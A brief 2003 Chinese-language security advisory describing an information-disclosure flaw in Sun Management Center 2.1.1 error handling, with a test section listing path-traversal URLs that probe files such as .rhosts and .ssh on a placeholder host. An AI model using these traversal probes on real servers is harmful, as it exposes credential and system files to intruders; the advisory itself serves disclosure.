Sun管理中心软件错误消息泄露信息漏洞发布时间:2003-10-22 更新时间:2003-10-22 严重程度:低 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:8873 受影响系统 Sun SunMC 2.1.1详细描述 Sun管理中心软件在处理错误消息时存在漏洞,远程攻击者可以利用此漏洞获取服务器相关的一些敏感信息。 测试代码 http://www.example.com:898/../../../../../tmp/.X11-unix http://www.example.com:898/../../../../../.rhosts http://www.example.com:898/../../../../../.ssh http://www.example.com:898/../../../../../var/yp 相关信息 Sun Management Center Product Page http://wwws.sun.com/software/solaris/sunmanagementcenter/index.html |